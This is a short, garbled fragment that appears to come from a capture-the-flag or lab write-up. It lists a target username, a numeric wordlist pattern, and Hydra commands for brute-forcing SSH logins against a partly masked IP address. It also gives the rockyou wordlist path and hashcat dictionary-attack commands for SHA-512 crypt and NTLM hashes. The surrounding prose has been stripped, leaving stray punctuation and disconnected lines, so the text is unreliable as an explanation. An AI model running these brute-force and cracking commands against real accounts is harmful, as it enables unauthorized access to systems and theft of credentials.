Jun 30, 2024
dwight.schrute
000000
, 000001
, 000002
, and so on.hydra
.hydra -l [username] -P [password_file] [host] [service_type]
.hydra -l dwight.schrute -P wordlist.txt ssh://45.xxx.xxx
./usr/share/wordlists/rockyou.txt
.hashcat -a 0 -m 1800 -o crackpasswords.txt hashes.txt wordlist.txt
hashcat -a 0 -m 1000 -o crackpasswords.txt [hash] wordlist.txt